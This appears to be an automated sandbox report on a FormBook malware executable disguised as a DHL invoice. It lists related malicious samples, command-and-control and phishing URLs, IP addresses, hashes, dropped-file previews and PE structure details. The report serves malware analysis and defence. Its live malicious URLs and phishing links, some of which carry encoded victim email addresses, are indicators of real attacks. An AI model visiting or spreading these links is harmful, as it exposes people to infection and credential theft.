VT rate limit hit for: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Simulations

Behavior and APIs

Time	Type	Description
15:35:18	API Interceptor	34x Sleep call for process: svchost.exe modified
15:35:22	API Interceptor	12356159x Sleep call for process: cscript.exe modified
15:35:42	API Interceptor	637729x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
65.21.196.90	42ZjBoAnX1.rtf	Get hash	malicious	FormBook	Browse	www.00050680.xyz/sk49/?aBWDfH=DP6tx2QHp&K4lp=5GTzvGjP6k9MjAkPrzxwWthptOK8N3QKes/6FYN5/ElPyt3wyqkU/OkBaVA77XqorlFk5g==
185.107.56.60	3wpfooP5Io.exe	Get hash	malicious	FormBook	Browse	www.produrielrosen.com/pnug/?lRwl=EzQzOtwAUSvnJODJK6/n7pdC73VaSGFOY0aAAp5RFICJ0Xsg1cwjw8jpxDeU33nQdeXnNcqs1A==&m0Dd=4hlLi030
	aziba.txt.html	Get hash	malicious	Unknown	Browse	tools.niod-tech.com/hackedbynoniod7.png
	hR7Em4PMvz.exe	Get hash	malicious	FormBook	Browse	www.toesonly.com/9gr5/?fx=Xvz0GT&b0Dh=47jGjRRcceVHfXjg9Eyx/Z9fJ85i4WtVHl78VTMuRsVzRE2n0QPJGpeRmVr8KAfb+Y2K
	Factura de proforma.Pdf.exe	Get hash	malicious	FormBook	Browse	www.delmegebuildingproducts.com/dv9n/?XdOLOtX=oYFcUXSVLo1mDF5rVf+rwH3vkD5IU8V8Pm6pZzf5MPVeDc0wMuwrJzrN6TWZ+7rQ8bIQ&q8tD=1btl4
	PRICE_REQUEST_QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.babeshotnud.com/rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc
	gRd8HGFpL7.exe	Get hash	malicious	FormBook	Browse	www.pxwuo.com/kgw/?8pBp5p=KjbuJJdeVq7diM0Fg7aQkrQXEwOw5P1EeEOzKgXGIrFUAWFa+z+/Ho4yN0BUW6oeKdMTmJKWlw==&LXPL=yvqlQXkhnxmxPrbP
	5j6RsnL8zx.exe	Get hash	malicious	FormBook	Browse	www.tomatrader.com/8rg4/?Txlp=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV&OHX=JRmh
84.32.84.32	PO#O_0140724.exe	Get hash	malicious	FormBook	Browse	www.rajveena.online/wptv/
	Ref_7021929821US20240709031221650.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.fnx-group.net/m1n9/?kFr8PR=iw0rIC5L6hostkULGys1mn9Z98rJFwBd4IZ9CWXlkC8Eo6XZ43yFv5eketBQRYNVgFwAUguZ+LMcNZUYMaaTKehcxUq8nTDdl+1/86C8L/zwryUwbA==&Fr=JNsp7
	Documente de expediere.exe	Get hash	malicious	FormBook	Browse	www.karak-networks.online/2afv/
	bum2sl4tSW66Q5O.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.packsperfeitas.shop/ps15/?jPj8q=pFQLwhtH0&t8o4=zsvC5rEuGJ4hWXPbafO2mimE5le/EQW7binyXpQ00wiK02bViikon7NxFYoYpXHBeyAU
	e-transac- RP062024 Nominal-PPI2452246 20240712NISPIDJA010O0100000503.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.saalameh.com/hfb9/
	OaHosly9lyzkZ0G.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.rajveena.online/wptv/
	New PO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.fxlentes.com/phvf/
	ORDEN_240715189833.IMG	Get hash	malicious	DarkTortilla, FormBook	Browse	www.noblessewine.com/fj61/
	afn6Od8oV1sUzD6.exe	Get hash	malicious	FormBook	Browse	www.rajveena.online/wptv/
	HSOwUsZ7hs6Pm4m.exe	Get hash	malicious	FormBook	Browse	www.lovezi.shop/htli/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
parkingpage.namecheap.com	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	LisectAVT_2403002B_309.exe	Get hash	malicious	Bdaejec, FormBook	Browse	91.195.240.19
	LisectAVT_2403002B_412.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	LisectAVT_2403002B_448.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	LisectAVT_2403002B_466.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	LisectAVT_2403002C_89.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	QNB SWIFT PAYMENT INTER-BANK SETTLEMENT FT22037358.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	COTIZACI#U00d3N.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Fzfee1Lgc2.elf	Get hash	malicious	Unknown	Browse	91.195.240.19
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	91.195.240.19

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTT-LT-ASLT	https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html%23e.szejgis@arlen.com.pl&c=E%2C10%2CGElLHQ3V9C4dUNBFMZt1mVRH2LpMhvMQrmpyxCta58errD7FQTDbxAt4Y5cCMR6WJVxZVMHk4h8%2BUN47&typo=1&know=0	Get hash	malicious	Unknown	Browse	84.32.84.212
	http://www.cabrerallamas.com/	Get hash	malicious	Unknown	Browse	84.32.84.136
	LisectAVT_2403002B_448.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	84.32.84.225
	LisectAVT_2403002C_3.exe	Get hash	malicious	FormBook	Browse	84.32.84.102
	PO#O_0140724.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	kJs0JTLO6I.exe	Get hash	malicious	Metasploit	Browse	84.32.84.139
	rFormulariodeso.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	84.32.84.16
	4Ear91jgQ7.exe	Get hash	malicious	FormBook	Browse	84.32.84.121
	Fzfee1Lgc2.elf	Get hash	malicious	Unknown	Browse	84.32.84.122
	0SpHek7Jd8.elf	Get hash	malicious	Unknown	Browse	84.32.84.247
CP-ASDE	http://elca.com.co/risebyliftingothers/fxc/bWN2QGNvcmVkYy5jb20=	Get hash	malicious	HTMLPhisher	Browse	65.21.29.43
	eqqjbbjMlt.elf	Get hash	malicious	Unknown	Browse	65.21.127.168
	http://reedempayml.ogr.my.id/	Get hash	malicious	HTMLPhisher	Browse	65.21.235.194
	Autodesk AutoCAD 2023.exe	Get hash	malicious	Vidar	Browse	65.21.246.249
	uJNDJ89PBT.exe	Get hash	malicious	Vidar	Browse	65.21.246.249
	42ZjBoAnX1.rtf	Get hash	malicious	FormBook	Browse	65.21.196.90
	http://ipscanadvsf.com	Get hash	malicious	Unknown	Browse	65.21.119.50
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	65.21.246.249
	SecuriteInfo.com.Win32.MalwareX-gen.13269.5515.exe	Get hash	malicious	Vidar	Browse	65.21.246.249
	http://ipscanadvsf.com	Get hash	malicious	Unknown	Browse	65.21.119.50
OIS1US	https://hardbin.com/ipfs/bafybeiga5vzkl7kqn7di5xybctgfvt4qeafpco3tdquxl7efx55uscqpei	Get hash	malicious	Unknown	Browse	162.241.71.126
	https://togisi-mubkm5ptpncdtkm5ptpncdt.narymar.com/	Get hash	malicious	Unknown	Browse	162.241.2.35
	appdrivesound.exe	Get hash	malicious	SystemBC	Browse	162.241.2.136
	https://www.cognitoforms.com/EngendaGroupLimited/EngendaGroupLimited	Get hash	malicious	HTMLPhisher	Browse	162.241.71.126
	https://www.cognitoforms.com/EngendaGroupLimited/EngendaGroupLimited	Get hash	malicious	HTMLPhisher	Browse	162.241.71.126
	https://acrobat.adobe.com/id/urn:aaid:sc:eu:ee698a8c-0f5f-4d49-8e57-941bebba7ea3	Get hash	malicious	HTMLPhisher	Browse	162.241.71.126
	https://m.exactag.com/ai.aspx?tc=d9498808bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Acatenconstrucoes.com%2Ffrest#c2NvdHQuam9obnNvbkB4Y2VsZW5lcmd5LmNvbQ==	Get hash	malicious	Unknown	Browse	162.241.2.50
	https://m.exactag.com/ai.aspx?tc=d9498808bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Acatenconstrucoes.com%2Ffrest#Y2FybG9zLmNhYmFkYUBkYWlpY2hpLXNhbmt5by5lcw==	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	162.241.2.50
	https://m.exactag.com/ai.aspx?tc=d9498808bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Acheckslope.com%2F.mtbt#aGl0ZXNoQHZlY3RyYS5haQ==	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	162.241.2.136
	Arc453466701.msi	Get hash	malicious	Unknown	Browse	162.241.2.244
NFORCENL	0SpHek7Jd8.elf	Get hash	malicious	Unknown	Browse	185.107.44.193
	https://66976095.webku.buzz/	Get hash	malicious	Unknown	Browse	185.66.143.73
	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	179.60.150.123
	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	179.60.150.123
	https://5228753.webku.buzz/	Get hash	malicious	Unknown	Browse	185.66.143.73
	https://34274421.webku.buzz/	Get hash	malicious	Unknown	Browse	185.66.143.73
	uJNDJ89PBT.exe	Get hash	malicious	Vidar	Browse	185.107.56.203
	https://beonlineboo.com	Get hash	malicious	Unknown	Browse	179.60.150.123
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	185.107.56.204
	SecuriteInfo.com.Win32.MalwareX-gen.13269.5515.exe	Get hash	malicious	Vidar	Browse	185.107.56.202
UNIFIEDLAYER-AS-1US	https://pousadaalgodaodapraia.com.br/wp-includes/Kinsh.html	Get hash	malicious	Unknown	Browse	162.241.102.156
	http://littlebighero.ch	Get hash	malicious	Unknown	Browse	162.241.224.188
	cliente.exe	Get hash	malicious	Unknown	Browse	108.179.252.188
	S982i1J0Uk.msi	Get hash	malicious	Unknown	Browse	108.179.252.188
	cliente.exe	Get hash	malicious	Unknown	Browse	108.179.252.188
	LisectAVT_2403002B_253.exe	Get hash	malicious	AgentTesla	Browse	192.185.226.171
	http://www.cabrerallamas.com/	Get hash	malicious	Unknown	Browse	192.185.131.139
	SEL1685129 AMANOS.pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251

Process:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.576028948585844
Encrypted:	false
SSDEEP:	768:JxU+eScFCo3T3iC9vp3IntIU++nN+nOkW/snst2Hz0mL5sCWi:s+eScFCo3T3i8vp3IntIU++nN+nOkW/w
MD5:	03B2E53D6AC1CB80B6CA22E3F27BAD77
SHA1:	55183889EE2ED2CDED8AAF09EDE031BDFA3DF743
SHA-256:	049BB98C864926C4AD93F47B4A172F96A77F70026E6D7C90C1F17D43570130B3
SHA-512:	E8D592260C2B70CEF667D2540D6FC1008ED613A62FA15E56E3586E5E2770C7B0E5332B29F15AE0EB794A6AC342E6F9BA4640C1015BEDE45D4D2CBBE37D520780
Malicious:	false
Reputation:	low
Preview:	3{88;ehf;4hfff353333898:e;9e33333399;<78;7e<9833333399;<7g;9ed:533333399;<88;;e;9h33333399;<78;de<9833333399;<7g;fed9f33333399;<88;he;6633333399;<78<3e<6533333399;<7g<5ed5h33333399;<88<7e;9733333399;<78<9e<9f33333399;<7g<;ed9f33333399;<88<d66f399;<78<fe<9h33333399;<;g77iiiiiied:733333399;<<879iiiiiie;9733333399;<;87;iiiiiie<9f33333399;<;g7diiiiiied9f33333399;<<87fiiiiiie;5h33333399;<;87hiiiiiie<9733333399;<;g83iiiiiied9f33333399;<<885iiiiiie;9f33333399;<;887iiiiii66f<99;<;g89iiiiiied:833333399;<88g3e;:633333399;<78g5e<9833333399;<7gg7ed:533333399;<88g9e;6633333399;<78g;e<6533333399;<7ggded5h33333399;<88gfe;9733333399;<78ghe<9f33333399;<7gh3ed9f33333399;<88h566f399;<78h7e<9433333399;<;g9;iiiiiied9733333399;<<89diiiiiie;:933333399;<;89fiiiiiie<9433333399;<;g9hiiiiiied:333333399;<<8:3iiiiiie;9<33333399;<;8:5iiiiiie<6633333399;<;g:7iiiiiied6533333399;<<8:9iiiiiie;5h33333399;<;8:;iiiiiie<9733333399;<;g:diiiiiied9f33333399;<<8:fiiiiiie;9f33333399;<;8:hiiiiii66f<99;<7g;3ed:633333399;<88d3e;9;

C:\Users\user\AppData\Local\Temp\aut6C1C.tmp

Download File

Process:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	181342
Entropy (8bit):	7.981146856115994
Encrypted:	false
SSDEEP:	3072:ES54jrTSpCanva0ZKuxAnDSUUZ7dUbatElwI1jCErqUtbliFXx:EI6rQLbKFnDeZ7dUblwbErqU2
MD5:	B6DD79F08F573262C501E40B76EB2157
SHA1:	A59648502834479E42E8DB955446E385A7D5D086
SHA-256:	C6E161EA9598139F75E989DF320C5E39026DF7ACB2DA73B311A5955A64A8DC51
SHA-512:	8013C1095E9442C54B0ADD8F796D13CFC5680BC5E01FF82A79178182745D4177E57399ABBB169DA7F05CB4E3D34719C4315B4A99ED7A637EB76013B999ED1402
Malicious:	false
Reputation:	low
Preview:	EA06.......Q....9.Fw}...5..\8tZ.g...Q.<n.Fq7..Ui.2.E.V(....CA...X.P.V.sy..c..`q..9-....D.}K..#.I.Zy9.[%R...e$.K&.:...U..8...O..(g3..ww.Y.....7<Y..]E.`3}..;G8.{.........;....Q[... .....R._).........ko8.U.t........no......P.(.g3..A:.U...H.._...71.U....LV(....(......b.V..<bEA...@.?..E2....l......P....5..R$....`........)...................D..,T....Q.6..Ji..v/~j%[...tpp{'.}..w.f.......EW....~...[.Z.....c....h...C}..U.;:...G....m.oI^.~9v...S.M.........3.)W&.;.x{Q..7GU.@)\..+.q.`;3....&................ku<.e...s{.&.}9.......Q.yJ.....d....O=...:z.6.P.d.P..Q.[..<]g...a6..f.....z...q...9...OG..2./..W..T&y....W......X..8.....Y.O)\.~gYR.Gk./^..'....E'.........2.S..z.;........'[..Uj_....<...y~.S.U..p..W6.8....7.q^.q".>."..Q._.T.....,..v......\|..V.....7...)^....N-N..5;+.'g~........ta[kN{....n..^......<Fgq....m..O..wl...N..l.1.,".I..k\|.c...dU=\|?I..nh...r..j9.8?.S..\|.<m.....;..~V90....X.........n...Awq.&.}\..r<..6.......w.wM.......A.J.qi...<..g..MW.

C:\Users\user\AppData\Local\Temp\aut6CC8.tmp

Download File

Process:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	9748
Entropy (8bit):	7.626451708716673
Encrypted:	false
SSDEEP:	192:ZxCiuJsp1HXOIGVpsaKy8t21MeHQ0AftURfs06M73u:ZxCiIsp5XOmy60wEE06Y3u
MD5:	A2F0A1C5C448ECC19C5DFBE7F515CE55
SHA1:	6C2BFDADB9F1333A4A7BE1527AD61D2AEC161473
SHA-256:	2C719F4B88D235F6156EAB0658F134D5301C061D36E945F1E5E111FB6AD204EB
SHA-512:	F0EDEC540DC41427C9E6109A36D6C5330D42A4B41405CCCB91D26F8735D4D0D255B5920563DE666EE38B17A694171A7A58643A321301C52C4CE1B561E2EAFFE2
Malicious:	false
Reputation:	low
Preview:	EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........\|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3\|vi..G.7...8_..qf..i\|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...

C:\Users\user\AppData\Local\Temp\teer

Download File

Process:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.873059199565214
Encrypted:	false
SSDEEP:	3072:0nSCVkV1qHQGNtHK7p+44YS6wiux0rK7WIiYhLZSk/NoaNp/iv7NFr42kuanWPlj:UVk36QGNtHCpd86Dux0rMphLZbNvo70k
MD5:	3290F959A30536836BD7FCF7359C3C16
SHA1:	C846F7A300A172A577258CCE093E54F9072BC812
SHA-256:	1C1DA36B87A6006CDD8751D486F3F50A423D3BC8356BE4112E19352DFAD5BCF1
SHA-512:	4F1C075FCC36EE3853D9EF2B7AA4A78BA0B589AD9EA0BA5A9D9104A6DE4A54AB96DB258834C60E786D1512C51D5F1C8CA4E1EBDD3DE880F5978DEC49A88E8C4F
Malicious:	false
Reputation:	low
Preview:	.....EY92...^....p.EU..rFQ...87W8RV0LHEVXGJZEY92A87W8RV0LHE.XGJTZ.72.1.v.S..m.-?+g:(>KS,.T6V<9Dl v*2$z,7.v.k.:W63.AEOrXGJZEY9..0..4.......!.E....^..8.......X...?.`([_..4.0LHEVXGJZEY92A87.}RV\|MIE..qZEY92A87.8PW;MBEV.EJZEY92A877.SV0\HEV.EJZE.92Q87W:RV5LIEVXGJ_EX92A87W.PV0NHEVXGJXE..2A(7W(RV0LXEVHGJZEY9"A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEx,"2.EY9..:7W(RV0.JEVHGJZEY92A87W8RV.LH%VXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHEVXGJZEY92A87W8RV0LHE

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.971279762366177
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File size:	1'120'256 bytes
MD5:	5ec011058b0884bc3b13563f97231c58
SHA1:	9846a460d630ea60c476df6dc92ae10d902bb54f
SHA256:	bc5a7642799c2f22d513dc19fb87848ecbe002f1815b2d5fd3a5af3fdbcdf0ae
SHA512:	d3172fe1fc90a3e8e4331bb4eeae03377825e26a815636c8931890fa9c1f8290eafa8c293e22b218d37f79a9202e62c5a5b13df40a14ebb828814a3797262523
SSDEEP:	24576:gqDEvCTbMWu7rQYlBQcBiT6rprG8apamXjozThdab7:gTvC/MTQYxsWR7ap7wn
TLSH:	6F35BF0273D1D022FF9B92334B5AF6515BBC69260123E61F13A81D7ABE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x669FAB19 [Tue Jul 23 13:07:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FB4A46D1513h
jmp 00007FB4A46D0E1Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FB4A46D0FFDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FB4A46D0FCAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FB4A46D3BBDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FB4A46D3C08h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FB4A46D3BF1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x3adc4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10f000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x3adc4	0x3ae00	3be27211be4182d73e38fe61685b8172	False	0.8889414145435244	data	7.796881825843965	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10f000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x3208a	data			1.0003464462422782
RT_GROUP_ICON	0x10e844	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x10e8bc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x10e8d0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x10e8e4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x10e8f8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x10e9d4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
